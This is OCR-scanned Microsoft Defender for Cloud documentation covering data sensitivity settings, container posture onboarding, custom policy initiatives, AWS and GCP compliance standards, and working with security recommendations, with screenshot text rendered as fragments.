7/17/2023, 10:03:42 PM 


Sensitivity label 


No sensitivity label 


Sensitive info types 


Credit Card Number E4 columns 
EU Debit Card Number ESA columns 
Canada Social Insurance Number E1 column 


Column samples 


> CardNumber (financedb1.mainSchema.Payment) 
Contained in 
financedb1.mainSchema.Payment.CardNumber 


Sensitive info types 


EU Debit Card Number 
Credit Card Number 


v  CardNumber (financedb2.mainSchema.Payment) 


be CardNumber (financedb2.BackupSchema.CCRef) 


The CSV file produced will include: 


e Sample name - depending on the resource type, this can be a database column, 
file name, or container name. 
e Sensitivity label — the highest ranking label found on this resource (same value for 


all rows). 


e Contained in — sample full path (file path or column full name). 
e Sensitive info types — discovered info types per sample. If more than one info type 
was detected, a new row will be added for each info type. This is to allow an easier 


filtering experience. 


O Note 


Download CSV report in the Cloud Security Explorer page will export all insights 
retrieved by the query in raw format (json). 


Next steps 


e Learn more about attack paths. 
e Learn more about Cloud Security Explorer. 


Customize data sensitivity settings 
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This article describes how to customize data sensitivity settings in Microsoft Defender 
for Cloud. 


Data sensitivity settings are used to identify and focus on managing the critical sensitive 


data in your organization. 


e The sensitive info types and sensitivity labels that come from Microsoft Purview 
compliance portal and which you can select in Defender for Cloud. By default 
Defender for Cloud uses the built-in sensitive information types provided by 
Microsoft Purview compliance portal. Some of the info types and labels are 
enabled by default, and you can modify them as needed. 

e You can optionally allow the import of custom sensitive info types and allow the 
import of sensitivity labels that you've defined in Microsoft Purview. 

e If you import labels, you can set sensitivity thresholds that determine the minimum 
threshold sensitivity level for a label to be marked as sensitive in Defender for 
Cloud. 


This configuration helps you focus on your critical sensitive resources and improve the 
accuracy of the sensitivity insights. 


Before you start 


e Make sure that you review the prerequisites and requirements for customizing 
data sensitivity settings. 

e In Defender for Cloud, enable sensitive data discovery capabilities in the Defender 
CSPM and/or Defender for Storage plans. 


Changes in sensitivity settings take effect the next time that resources are discovered. 


Import custom sensitive info types/labels 


Defender for Cloud uses built-in sensitive info types. You can optionally import your 
own custom sensitive info types and labels from Microsoft Purview compliance portal to 
align with your organization's needs. 


Import as follows (Import only once): 


1. Log into Microsoft Purview compliance portal. 


2. Navigate to Information Protection > Labels”. 
3. In the consent notice message, select Turn on and then select Yes to share your 
custom info types and sensitivity labels with Defender for Cloud. 


© Note 


e Imported labels appear in Defender for Cloud in the order rank that's set in 
Microsoft Purview. 
e The two sensitivity labels that are set to highest priority in Microsoft Purview 


are turned on by default in Defender for Cloud. 


Customize sensitive data categories/types 


To customize data sensitivity settings that appear in Defender for Cloud, review the 
prerequisites, and then do the following. 


1. Sign in to the Azure portal £. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select Data sensitivity. 

4. Select the info type category that you want to customize: 


e The Finance, PII, and Credentials categories contain the default info type 
data that are typically sought out by attackers. 

e The Custom category contains custom info types from your Microsoft 
Purview compliance portal configuration. 


e The Other category contains all of the rest of the built-in available info types. 
5. Select the info types that you want to be marked as sensitive. 


6. Select Apply and Save. 


Home > Microsoft Defender for Cloud | Environment settings Finance info types 
Data sensitivity 


Select finance info types 


Be Guides & Feedback Ø Search 


All 


Manage data sensitivity settings of cloud resources at the tenant level, based on selective info types and labels originating fro} 
Use the Microsoft Purview portal to create your own customized info types and labels. 
You can discover sensitive data resources in the Cloud map Security Explorer and attack path, as well as within security alerts. 


@ ABA Routing Number 
Set resource sensitivity based on info types gittuen 
Select the info types that are considered sensitive for your organization's cloud resources. EU debit card number 
All resources with the selected info types will be considered sensitive. 
International banking account number (IBAN) 
Finance © (4/5 selected) E SWIFT code 
Pll © (6/45 selected) 
Credentials © (3/3 selected) 
Custom © (1/4 selected) 
Other © (5/132 selected) 


Set the threshold for sensitive data labels 


You can set a threshold to determine the minimum sensitivity level for a label to be 
marked as sensitive in Defender for Cloud. 


If you're using Microsoft Purview sensitivity labels, make sure that: 


e the label scope is set to "Items"; under which you should configure auto labeling 
for files and emails 


e labels must be published with a label policy that is in effect. 

1. Sign in to the Azure portal Z. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 

3. Select Data sensitivity. The current minimum sensitivity threshold is shown. 


4. Select Change to see the list of sensitivity labels and select the lowest sensitivity 
label that you want marked as sensitive. 


5. Select Apply and Save. 


Home > Microsoft Defender for Cloud | Environment settings Sensitivity label threshold x 
Data sensitivity 


Select a sensitivity label threshold. Any labels at or above this threshold will be considered 


sensitive. 
Save ZG) Guides & Feedback 


Note that the sensitivity labels shown below have automatic labelling rules assigned to them in 


Manage data sensitivity settings of cloud resources at the tenant level, based on selective info types and labels originating fron te Purview portal. 
Use the Microsoft Purview portal to create your own customized info types and labels. 

Sensitivity label threshold © OO on 
You can discover sensitive data resources in the Cloud map Security Explorer and attack path, as well as within security alerts. 


Set resource sensitivity based on info types Pr Confidential eaves sau 


Select the info types that are considered sensitive for your organization's cloud resources. i) Confidential = 
All resources with the selected info types will be considered sensitive. O General 
Finance © (5/5 selected) O Public 
O Non-Business 
GU © (43/45 selected) 
Credentials © (3/3 selected) 
Custom (0} (0/20 selected) 
Other © (0/132 selected) 


Set sensitivity label threshold 


Select the sensitivity labels threshold for your organization's cloud resources. 
All resources with labels at or above this threshold will be considered sensitive. 


Minimum sensitivity threshold: Confidential Change > 
Apply Cancel 


O Note 


e When you turn on the threshold, you select a label with the lowest setting 
that should be considered sensitive in your organization. 

e Any resources with this minimum label or higher are presumed to contain 
sensitive data. 

e For example, if you select Confidential as minimum, then Highly Confidential 
is also considered sensitive. General, Public, and Non-Business aren't. 

e You can't select a sub label in the threshold. However, you can see the 
sublabel as the affected label on resources in attack path/Cloud Security 
Explorer, if the parent label is part of the threshold (part of the sensitive labels 
selected). 

e The same settings will apply to any supported resource (object storage and 


databases). 


Next steps 


Review risks to sensitive data 


Onboard agentless container posture in 
Defender CSPM 
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Onboarding agentless container posture in Defender CSPM will allow you to gain all its 
capabilities. 


Defender CSPM includes two extensions that allow for agentless visibility into 
Kubernetes and containers registries across your organization's software development 
lifecycle. 


To onboard agentless container posture in Defender CSPM: 
1. Before starting, verify that the subscription is onboarded to Defender CSPM. 


2. In the Azure portal, navigate to the Defender for Cloud's Environment Settings 


page. 


3. Select the subscription that's onboarded to the Defender CSPM plan, then select 
Settings. 


4. Ensure the Agentless discovery for Kubernetes and Container registries 
vulnerability assessments extensions are toggled to On. 


5. Select Continue. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plan 
Settings & monitoring 
Rome ILDC - DCSPM Testing 


6. Select Save. 


A notification message pops up in the top right corner that will verify that the settings 
were saved successfully. 


What are the extensions for agentless container 
posture management? 


There are two extensions that provide agentless CSPM functionality: 


e Container registries vulnerability assessments: Provides agentless containers 
registries vulnerability assessments. Recommendations are available based on the 
vulnerability assessment timeline. Learn more about image scanning. 

e Agentless discovery for Kubernetes: Provides API-based discovery of information 
about Kubernetes cluster architecture, workload objects, and setup. 


How can I onboard multiple subscriptions at 
once? 


To onboard multiple subscriptions at once, you can use this script £. 


Why don't | see results from my clusters? 


If you don't see results from your clusters, check the following: 


e Do you have stopped clusters? 
e Are your resource groups, subscriptions, or clusters locked? 


What can | do if | have stopped clusters? 


We do not support or charge stopped clusters. To get the value of agentless capabilities 
on a stopped cluster, you can rerun the cluster. 


What do | do if | have locked resource groups, 
subscriptions, or clusters? 


We suggest that you unlock the locked resource group/subscription/cluster, make the 
relevant requests manually, and then re-lock the resource group/subscription/cluster by 
doing the following: 


1. Enable the feature flag manually via CLI by using Trusted Access. 


CLI 


“az feature register --namespace "Microsoft.ContainerService" --name 
"TrustedAccessPreview” 


2. Perform the bind operation in the CLI: 


CLI 


az account set -s <SubscriptionId> 
az extension add --name aks-preview 


az aks trustedaccess rolebinding create --resource-group <cluster 
resource group> --cluster-name <cluster name> --name defender- 
cloudposture --source-resource-id 
/subscriptions/<SubscriptionId>/providers/Microsoft.Security/pricings/C 
loudPosture/securityOperators/DefenderCSPMSecurityOperator --roles 
"Microsoft.Security/pricings/microsoft-defender-operator" 


For locked clusters, you can also do one of the following: 


e Remove the lock. 
e Perform the bind operation manually by making an API request. 


Learn more about locked resources. 


Are you using an updated version of AKS? 


Learn more about supported Kubernetes versions in Azure Kubernetes Service (AKS). 


Next Steps 


e Learn more about Trusted Access. 

e Learn how to view and remediate vulnerability assessment findings for registry 
images. 

e Learn how to view and remediate vulnerabilities for images running on your AKS 
clusters. 

e Learn how to Test the Attack Path and Security Explorer using a vulnerable 
container image 

e Learn how to create an exemption for a resource or subscription. 

e Learn more about Cloud Security Posture Management. 


Create custom Azure security initiatives 
and policies 
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To help secure your systems and environment, Microsoft Defender for Cloud generates 
security recommendations. These recommendations are based on industry best 
practices, which are incorporated into the generic, default security policy supplied to all 
customers. They can also come from Defender for Cloud's knowledge of industry and 
regulatory standards. 


With this feature, you can add your own custom initiatives. Although custom initiatives 
aren't included in the secure score, you'll receive recommendations if your environment 
doesn't follow the policies you create. Any custom initiatives you create are shown in the 
list of all recommendations and you can filter by initiative to see the recommendations 
for your initiative. They're also shown with the built-in initiatives in the regulatory 
compliance dashboard, as described in the tutorial Improve your regulatory compliance. 


As discussed in the Azure Policy documentation, when you specify a location for your 


custom initiative, it must be a management group or a subscription. 


Tip 
For an overview of the key concepts on this page, see What are security policies, 


initiatives, and recommendations?. 


You can view your custom initiatives organized by controls, similar to the controls in the 
compliance standard. To learn how to create policy groups within the custom initiatives 
and organize them in your initiative, follow the guidance provided in the policy 
definitions groups. 


To add a custom initiative to your subscription 


1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription or management group to which you would like to 
add a custom initiative. 


© Note 


For your custom initiatives to be evaluated and displayed in Defender for 
Cloud, you must add them at the subscription level (or higher). We 
recommend that you select the widest scope available. 


3. Open the Security policy page, and in the Your custom initiatives area, select Add 
a custom initiative. 


Home > Settings 

@; Settings | Security policy 

[2 Search 

== — Security policy on: 


Settings 


= initiatives enabled on this subscription 
©) Defender plans 


@ Email notifications SN DI Default initiative 


Tó Workflow automation 


© integrations No existing Policy assignments 


Policy settings 
= Security policy ~ le ] Industry & regulatory standards 


GO Governance rules (preview) 


E Continuous export 


Compliance initiatives shown in the Regulatory compliance dashboard. 


Microsoft cloud security Track Azure Security Benchmark Out of the box 
benchmark controls in the Compliance 
Dashboard, based on a recommended 
set of policies and assessments. 
PCI DSS 3.2.1 Track PCI-DSS v3.2.1:2018 controls in Out of the box 
the Compliance Dashboard, based on 
a recommended set of policies and 
assessments. 
ISO 27001 Track ISO 27001:2013 controls in the Out of the box 
Compliance Dashboard, based on a 
recommended set of policies and 
assessments. 
SOC TSP Track SOC TSP controls in the Out of the box 
Compliance Dashboard, based ona 
recommended set of policies and 
assessments. 


Add more standards 


N dk Your custom initiatives 


e 


Custom initiatives generate custom recommendations in the Recommendations page. Q 


Add a custom initiative 


4. Review the list of custom policies already created in your organization, and select 
Add to assign a policy to your subscription. 


If there isn't an initiative in the list that meets your needs, you can create one. 
To create a new custom initiative: 
1. Select Create new. 


2. Enter the definition's location and custom name. 


O Note 


Custom initiatives shouldn't have the same name as other initiatives (custom 
or built-in). If you create a custom initiative with the the same name, it will 


cause a conflict in the information displayed in the dashboard. 


3. Select the policies to include and select Add. 
4. Enter any desired parameters. 
5. Select Save. 


6. In the Add custom initiatives page, select refresh. Your new initiative will be 


available. 


7. Select Add and assign it to your subscription. 


Add custom initiatives 


AN 
Gide 


GETE 


Or, to add an existing initiative from the list below, click Add in the relevant row 


After adding the policy initiative, it will be listed as a recommendation in the Recommendations blade, and to have it added in the Regulatory compliance dashboard 


© If the initiative is not already assigned on this subscription, after clicking Add, be sure to assign the initiative on the subscription. 


arch to filter items. 


NAME Ty DESCRIPTION t4 STATUS Ty Ty 


Organizational policy custom policy Not assigned 


O Note 


Creating new initiatives requires subscription owner credentials. For more 
information about Azure roles, see Permissions in Microsoft Defender for 
Cloud. 


Your new initiative takes effect and you can see the results in the following two 
ways: 


e From the Defender for Cloud menu, select Regulatory compliance. The 
compliance dashboard opens to show your new custom initiative alongside 
the built-in initiatives. 


e You'll begin to receive recommendations if your environment doesn't follow 
the policies you've defined. 


8. To see the resulting recommendations for your policy, select Recommendations 
from the sidebar to open the recommendations page. The recommendations will 
appear with a "Custom" label and be available within approximately one hour. 


Recommendation TA 


[Preview]: Show audit results from Windows VMs that do not have a minimum password age of 1 day 
[Preview]: Show audit results from Windows VMs that do not have a maximum password age of 70 days 
[Preview]: Show audit results from Windows VMs that allow re-use of the previous 24 passwords EE 


[Preview]: Show audit results from Windows VMs on which the Log Analytics agent is not connected as expected 


Enhance your custom recommendations with 
detailed information 


The built-in recommendations supplied with Microsoft Defender for Cloud include 
details such as severity levels and remediation instructions. If you want to add this type 
of information to your custom recommendations so that it appears in the Azure portal 
or wherever you access your recommendations, you'll need to use the REST API. 


The two types of information you can add are: 


e RemediationDescription — String 
e Severity — Enum [Low, Medium, High] 


The metadata should be added to the policy definition for a policy that is part of the 
custom initiative. It should be in the ‘securityCenter’ property, as shown: 


JSON 


"metadata": { 
"securityCenter": { 
"RemediationDescription": "Custom description goes here", 
"Severity": "High" 
J 


Here's another example of a custom policy including the metadata/securityCenter 
property: 


JSON 


{ 
"properties": { 

"displayName": "Security - ERvNet - AuditRGLock", 

"policyType": "Custom", 

"mode": "All", 

"description": "Audit required resource groups lock", 

"metadata": { 

"securityCenter": { 
"RemediationDescription": “Resource Group locks can be set via 


Azure Portal -> Resource Group -> Locks", 
"Severity": "High" 


KE 
"parameters": { 
"expressRouteLockLevel": { 
"type: “String”, 
"metadata": { 
"displayName": “Lock level", 
"description": “Required lock level for ExpressRoute 
resource groups." 
Jo 
"allowedValues": [ 
"CanNotDelete", 


"ReadOnly" 
] 
} 
Fa 
"policyRule": { 
sifa 
"field": "type", 
"equals": "Microsoft.Resources/subscriptions/resourceGroups" 
Fo 
"then": { 
"effect": "auditIfNotExists", 
"details": { 
"type": "Microsoft.Authorization/locks", 
"existenceCondition": { 
"field": "Microsoft.Authorization/locks/level", 
"equals": "[parameters('expressRouteLockLevel')]" 
} 
} 
} 
} 
} 
} 


For another example of using the securityCenter property, see this section of the REST 
API documentation. 


Next steps 
In this article, you learned how to create custom security policies. 
For other related material, see the following articles: 


e The overview of security policies 
e A list of the built-in security policies 


Manage AWS assessments and 
standards 


Article e 03/09/2023 


Security standards contain comprehensive sets of security recommendations to help 
secure your cloud environments. Security teams can use the readily available standards 
such as AWS CIS 1.2.0, AWS CIS 1.5.0, AWS Foundational Security Best Practices, and 
AWS PCI DSS 3.2.1. 


There are two types of resources that are needed to create and manage assessments: 


e Standard: defines a set of assessments 
e Standard assignment: defines the scope, which the standard evaluates. For 


example, specific AWS account(s). 


Create a custom compliance standard to your 
AWS account 


To create a custom compliance standard to your AWS account: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant AWS account. 


4. Select Standards > + Create > Standard. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


y= Settings | Standards 


Defender plans 


Policy settings 


© Governance rules (preview) 


5. Enter a name, description and select built-in recommendations from the drop- 


down menu. 


© retes 


Standard 


Security standards contain comprehensive sets of security recommendations to help secure your cloud environments. The below standards are assigned on your environment. 


Sei 


Showing 1-10 of 15 items 


Name 7 


test standard 
test standard 


test standard 
test standard 


E E 


AWS CIS 1.2.0 
AWS CIS 1.2.0 


b 


AWS CIS 1.5.0 
AWS CIS 1.5.0 


E & b 


AWS PCI DSS 3.2.1 
AWS PCI DSS 3.2.1 


b 


test 


Custom standard 
Custom 


E E 


standard test 
EEE test 


E 


h by name 


Standard type : All 


AWS Foundational Security Best Practices 
‘AWS Foundational Security Best Practices includes best practice security recommendations for a veriatly of Amazon Web Services workloads. 


AWS NIST SP 800 53 R5 (preview) 
AWS NIST SP 800 53 RS (preview) 


CloudFrontWebDistributionSafeena 


Page [4 


wot [nets] 


Recommendations 7 


45 


56 


126 


GO 


10 


Type 7 


Custom 


Custom 


Compliance 


Compliance 


Default 


Compliance 


Compliance 


Custom 


Custom 


Custom 


Create new standard x 


Recommendations * 


| x] 


Ø Search i 


Built-in 


E Amazon Aurora clusters should have backtracking enabled 

E Amazon EBS snapshots should not be publicly restorable 

E Amazon EC2 instances managed by Systems Manager should have a patch complianc... 
E Amazon EC2 should be configured to use VPC endpoints 

E Amazon ECS services should not have public IP addresses assigned to them automatic.. 
C] Amazon ECS task definitions should have secure networking modes and user definition: 
JU Amazon EFS should be configured to encrypt file data at rest using AWS KMS 

E Amazon EFS should be encrypted using CMK 

JU Amazon EFS volumes should be in backup plans 


I Amazon Elasticsearch Service domains should be in a VPC 


Create Cancel 


6. Select Create. 


Assign a built-in compliance standard to your 
AWS account 


To assign a built-in compliance standard to your AWS account: 


1. Sign in to the Azure portal £. 


2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant AWS account. 


4. Select Standards. 


5. Select the three dot button for the built-in standard you want to assign. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


v= Settings | Standards 


x 
[2 search | « + create v D Refresh 
Settings 
Standards 
E Defender plans 
$= Standards Security standards contain comprehensive sets of security recommendations to help secure your cloud environments. The below standards are assigned on your environment. 
Policy settings O Search by name Standard type : All 
© Governance rules (preview) Showing 1-10 of 15 items 
Name ty Recommendations TA Type Assigned on ty 
AWS CIS 1.2.0 
JR aws cis 120 45 Compliance Not assigned 
AWS CIS 1.5.0 
i AWS CIS 1.5.0 56 Compliance Account 
e AWS NIST SP 800 53 R5 (preview) 
GA AWS NIST SP 800 53 R5 (preview) 89 Compliance Account 


AWS PCI DSS 3.2.1 


f y 
| | 
AWS PCI DSS 3.2.1 44 Compliance Not assigned C3 


6. Select Assign standard. 


b 


7. Select Yes. 


Next steps 


In this article, you learned how to manage your assessments and standards in Defender 
for Cloud. 


Find recommendations that can improve your security posture 


Manage GCP assessments and standards 
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Security standards contain comprehensive sets of security recommendations to help 
secure your cloud environments. Security teams can use the readily available regulatory 
standards such as GCP CIS 1.1.0, GCP CIS and 1.2.0, or create custom standards to meet 
specific internal requirements. 


There are two types of resources that are needed to create and manage standards: 


e Standard: defines a set of assessments 
e Standard assignment: defines the scope, which the standard evaluates. For 
example, specific GCP projects. 


Create a custom compliance standard to your 
GCP project 
To create a custom compliance standard to your GCP project: 

1. Sign in to the Azure portal Z. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 

3. Select the relevant GCP project. 


4. Select Standards > + Create > Standard. 


Home > Microsoft Defender for Cloud | Envir 
y= Settings | Standards 


Recommendations 1 Type + Assigned on t 


Compliance 


. GCP Default 


5. Enter a name, description and select built-in recommendations from the drop- 


down menu. 


Create new standard x 


Name* (i) 


Description* (i) 


Recommendations * 


| Ø Search | | 
Built-in 

I Advanced configuration of Defender for Containers should be enabled on GCP connec.. 
I Cluster hosts should be configured to use only private, internal IP addresses to access .. 
I Compute Engine VMs should use the Container-Optimized OS 

I Compute instances should use a load balancer that is configured to use a target HTTP... 
I Control Plane Authorized Networks should be enabled on GKE clusters 

I Cryptographic keys should not have more than three users 

E Egress deny rule should be set on a firewall to block unwanted outbound traffic 

I Ensure '3625 (trace flag)’ database flag for Cloud SQL SQL Server instance is set to ‘off 
I Ensure ‘Block Project-wide SSH keys' is enabled for VM instances 


I Ensure ‘Enable connecting to serial ports' is not enabled for VM Instance 


Create Cancel a 


6. Select Create. 


Assign a built-in compliance standard to your 
GCP project 


To assign a built-in compliance standard to your GCP project: 


1. Sign in to the Azure portal @. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant GCP project. 

4. Select Standards. 


5. Select the three dot button for the built-in standard you want to assign. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


y= Settings | Standards ~ x 
z= 
[2 Search | « + Create w | ©) Refresh 
Settings 
e Standards 
E Defender plans 
e Standards Security standards contain comprehensive sets of security recommendations to help secure your cloud environments. The below standards are assigned on your environment. 
Policy settings | © Search by name j Standard type : All 
© Governance rules (preview) Showing 1-10 of 16 items 
Name Ty Recommendations TA Type T Assigned on Ty 
GCP CIS 1.1.0 
úl casio 61 Compliance Account 
GCP CIS 1.2.0 
E GCP CIS 1.2.0 78 Compliance Account 
GCP ISO 27001 (preview) 
MA cp iso 27001 44 Compliance Not assigned 
i, 
| GCP NIST 800 53 (preview) . A < A 
SS GcP NIST 80053 43 Compliance Not assigned aA 
GCP PCI DSS 3.2.1 (preview) A ~ d 
kl GCP PCI DSS 3.2.1 52 Compliance Not assigned B 


6. Select Assign standard. 


7. Select Yes. 


Next steps 


In this article, you learned how to manage your assessments and standards in Defender 
for Cloud. 


Find recommendations that can improve your security posture 


Find recommendations that can 
improve your security posture 
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To improve your secure score, you have to implement the security recommendations for 
your environment. From the list of recommendations, you can use filters to find the 
recommendations that have the most impact on your score, or the ones that you were 


assigned to implement. 

To get to the list of recommendations: 
1. Sign in to the Azure portal £. 
2. Either: 


e In the Defender for Cloud overview, select Security posture and then select 
View recommendations for the environment you want to improve. 
e Go to Recommendations in the Defender for Cloud menu. 


You can search for specific recommendations by name. Use the search box and filters 
above the list of recommendations to find specific recommendations. Look at the details 
of the recommendation to decide whether to remediate it, exempt resources, or disable 


the recommendation. 


You can learn more by watching this video from the Defender for Cloud in the Field 


video series: 


e Security posture management improvements 


Finding recommendations with high impact on 
your secure score 


Your secure score is calculated based on the security recommendations that you've 
implemented. In order to increase your score and improve your security posture, you 
have to find recommendations with unhealthy resources and remediate those 


recommendations. 


The list of recommendations shows the Potential score increase that you can achieve 
when you remediate all of the recommendations in the security control. 


To find recommendations that can improve your secure score: 


1. In the list of recommendations, use the Potential score increase to identify the 
security control that contains recommendations that will increase your secure 


score. 


e You can also use the search box and filters above the list of recommendations 
to find specific recommendations. 


2. Open a security control to see the recommendations that have unhealthy 


resources. 


When you remediate all of the recommendations in the security control, your secure 
score increases by the percentage point listed for the control. 


Manage the owner and ETA of 
recommendations that are assigned to you 


Security teams can assign a recommendation to a specific person and assign a due date 
to drive your organization towards increased security. If you have recommendations 
assigned to you, you're accountable to remediate the resources affected by the 
recommendations to help your organization be compliant with the security policy. 


Recommendations are listed as On time until their due date is passed, when they're 
changed to Overdue. Before the recommendation is overdue, the recommendation 
doesn't affect the secure score. The security team can also apply a grace period during 
which overdue recommendations continue to not affect the secure score. 


To help you plan your work and report on progress, you can set an ETA for the specific 
resources to show when you plan to have the recommendation resolved by for those 
resources. You can also change the owner of the recommendation for specific resources 
so that the person responsible for remediation is assigned to the resource. 


Home > Microsoft Defender for Cloud Change owner and set ETA x 
Management ports of EGO instances should be protectec Assign a new owner and/or define an estimated date by when the selected resources will be resolved 


Vv Open query @ Change owner 
e Owner * 
Severity Freshness interval 
A | test@microsoft.com 
| High I 6 Hours —— 


Due date 


^ Description @ Change ETA 


Microsoft Defender for Cloud has identified some overly-permissive inbound rules for management ports in yo 


force attacks. Learn more. Estimated remediation time (ETA) * 
V Remediation steps ueso m 
^ Affected resources Justification * 
Unhealthy resources (80) Healthy resources (29) Not applicable resources (0) 
D Search AWS resources 
[m] Name Ty AWS Account Connector name Region 
o E i-Ofe23e7cf8c384802 424151343163 AWSNinjaConnector us-east-2 
@ & i-Ofce6d2eb4a7bab60 102614528198 securityConnector us-east-2 
o E i-Ofa846c90e52df391 098881452406 MDC_Containers_demo us-west- 
E & i-0f62bd384abbad443 102614528198 securityConnector us-east-2 
O E i-Oeeeff34d44b10fb1 102614528198 securityConnector us-east-2 
O @! i-0eca051be6ffcc0e7 102614528198 securityConnector us-east-1 
E @ i-0ea906079d07941da 102614528198 securityConnector us-east-7 
g E i-0ea75758bf2135b42 102614528198 securityConnector us-east-1 
g @) i-0e89107a2304e4b90 102614528198 securityConnector us-east-1 
oO E i-0e5f481c9a0fb31d9 102614528198 securityConnector us-east-1 
E W i-0e382522f05a9a925 102614528198 securityConnector us-east-1 O edi ed will be sent to specified owners with all recommendations they are rs 


| Fix | Trigger logic app Assign owr Change owner and set ETA Q 
| 


To change the owner of resources and set the ETA for remediation of recommendations 
that are assigned to you: 


1. In the filters for list of recommendations, select Show my items only. 


e The status column indicates the recommendations that are on time, overdue, 
or completed. 

e The insights column indicates the recommendations that are in a grace 
period, so they currently don't affect your secure score until they become 


overdue. 
2. Select an on time or overdue recommendation. 


3. For the resources that are assigned to you, set the owner of the resource: 
a. Select the resources that are owned by another person, and select Change 
owner and set ETA. 
b. Select Change owner, enter the email address of the owner of the resource, and 
select Save. 


The owner of the resource gets a weekly email listing the recommendations that 
they're assigned. 


4. For resources that you own, set an ETA for remediation: 
a. Select resources that you plan to remediate by the same date, and select 
Change owner and set ETA. 
b. Select Change ETA and set the date by which you plan to remediate the 
recommendation for those resources. 


c. Enter a justification for the remediation by that date, and select Save. 


The due date for the recommendation doesn't change, but the security team can see 
that you plan to update the resources by the specified ETA date. 


Review recommendation data in Azure 
Resource Graph (ARG) 


You can review recommendations in ARG both on the Recommendations page or on an 
individual recommendation. 


The toolbar on the Recommendations page includes an Open query button to explore 
the details in Azure Resource Graph (ARG), an Azure service that gives you the ability to 
query - across multiple subscriptions - Defender for Cloud's security posture data. 


ARG is designed to provide efficient resource exploration with the ability to query at 
scale across your cloud environments with robust filtering, grouping, and sorting 
capabilities. It's a quick and efficient way to query information across Azure 
subscriptions programmatically or from within the Azure portal. 


Using the Kusto Query Language (KQL), you can cross-reference Defender for Cloud 
data with other resource properties. 


For example, this recommendation details page shows 15 affected resources: 


MFA should be enabled on accounts with write permissions on your subscription 


© Exempt CG View policy definition Vv Open query 


A^ Description 


Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with write privileges to prevent a breach of accounts or resources. 
wv Remediation steps 
^ Affected resources 


Unhealthy resources (0) Healthy resources (12) Not applicable resources (3) 


O Search subscriptions 


g Name y Subscription 


No resources found. 


When you open the underlying query, and run it, Azure Resource Graph Explorer returns 
the same 15 resources and their health status for this recommendation: 


Azure Resource Graph Explorer d 


[e Search | SA + New query E Open a query > Run query Save Save as 9 Feedback 
> EB advisorresources Query 1 
> E alertsmanagementresources 1 securityresources 
> E extendedlocationresources 2 | where type == "microsoft.security/assessments” 
3 | extend source = tostring(properties.resourceDetails.Source) 
> E guestconfigurationresources 
3 4 | extend resourceId = 
> Fi healthresources 5 trim(" ", tolower(tostring(case(source =~ "azure", properties.resourceDetails.Id, 
> EB kubernetesconfigurationresources 6 source =~ “aws", properties.resourceDetails.AzureResourceld, 
7 source =~ “gcp”, properties.resourceDetails.AzureResourceld 
> EB maintenanceresources e Ge oP e . Gz 
8 extract("*(.+)/providers/Microsoft.Security/assessments/.+$",1,id))))) 
> BB patchassessmentresources 9 | extend status = trim(" ", tostring(properties.status.code)) 
> B patchinstallationresources 10 | extend cause = trim(" ", tostring(properties.status.cause)) 
aa EEE BEE 


> EB policyresources 
Get started Results Charts Messages 


> E recoveryservicesresources 

> EB resourcecontainers 

(EI d Download as CSV Pin to dashboard 

> EB resources 

> E securityresources id name type tenantid status location resourceGroup 
servicehealthresources 

> EB /subscriptions/O0edf... 57e98606-6b1... microsoft.security/asse... 72f988bf-8... | Healthy 

> EB workloadmonitorresources 

/subscriptions/O4cd... 57e98606-6b1... microsoft.security/asse... 72f988bf-8... | Healthy 


/subscriptions/Oba6... 57e98606-6b1... microsoft.security/asse... 72f988bf-8... | NotApplicable 


/subscriptions/212f9... 57e98606-6b1... microsoft.security/asse... 72f988bf-8... | Healthy 


4 » 


Page | AE v] of 1 


@ Results: 15 (Duration: 00:00.652) 


Recommendation insights 


The Insights column of the page gives you more details for each recommendation. The 
options available in this section include: 


Icon Name Description 

W Preview This recommendation won't affect your secure score until it's GA. 
recommendation 

E Fix From within the recommendation details page, you can use E to 


resolve this issue. 


©) Enforce From within the recommendation details page, you can automatically 
deploy a policy to fix this issue whenever someone creates a non- 
compliant resource. 


Ə Deny From within the recommendation details page, you can prevent new 
resources from being created with this issue. 


Recommendations that aren't included in the calculations of your secure score, should 
still be remediated wherever possible, so that when the period ends they'll contribute 
towards your score instead of against it. 


Download recommendations to a CSV report 


Recommendations can be downloaded to a CSV report from the Recommendations 
page. 


To download a CSV report of your recommendations: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Recommendations. 


3. Select Download CSV report. 


Home > Microsoft Defender for Cloud 


er: Microsoft Defender for Cloud | Recommendations 


Showing subscription ‘MDC 


| 2 Search (Ctri+/) | « oO Refresh 4 Download CSV report v Open query Gel Guides & Feedback 


General 


. Secure score recommendations All recommendations 
D Overview E 


You'll know the report is being prepared when the pop-up appears. 


Preparing CSV report for download EA 


Preparing your CSV report — this may take a while. 
Recommendations from all filtered subscriptions will be 
included in the report. 


When the report is ready, you'll be notified by a second pop-up. 


@ Downloading CSV report x 


Your CSV report is ready and will now begin 
downloading 


Learn more 


You can check out the following blogs: 


e Security posture management and server protection for AWS and GCP are now 
generally available z 
e New enhancements added to network security dashboard” 


Next steps 


In this document, you were introduced to security recommendations in Defender for 
Cloud. For related information: 


Remediate recommendations-Learn how to configure security policies for your 
Azure subscriptions and resource groups. 

Prevent misconfigurations with Enforce/Deny recommendations. 

Automate responses to Defender for Cloud triggers-Automate responses to 
recommendations 

Exempt a resource from a recommendation 


Security recommendations - a reference guide 


Implement security recommendations in 
Microsoft Defender for Cloud 
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Recommendations give you suggestions on how to better secure your resources. You 
implement a recommendation by following the remediation steps provided in the 
recommendation. 


Remediation steps 


After reviewing all the recommendations, decide which one to remediate first. We 
recommend that you prioritize the security controls with the highest potential to 
increase your secure score. 


1. From the list, select a recommendation. 


2. Follow the instructions in the Remediation steps section. Each recommendation 
has its own set of instructions. The following screenshot shows remediation steps 
for configuring applications to only allow traffic over HTTPS. 


Secure transfer to storage accounts should be enabled -~ x 


Exempt Deny CG View policy definition E Open que 
P y policy pen query 


Severity Freshness interval Exempted resources Tactics and techniques 


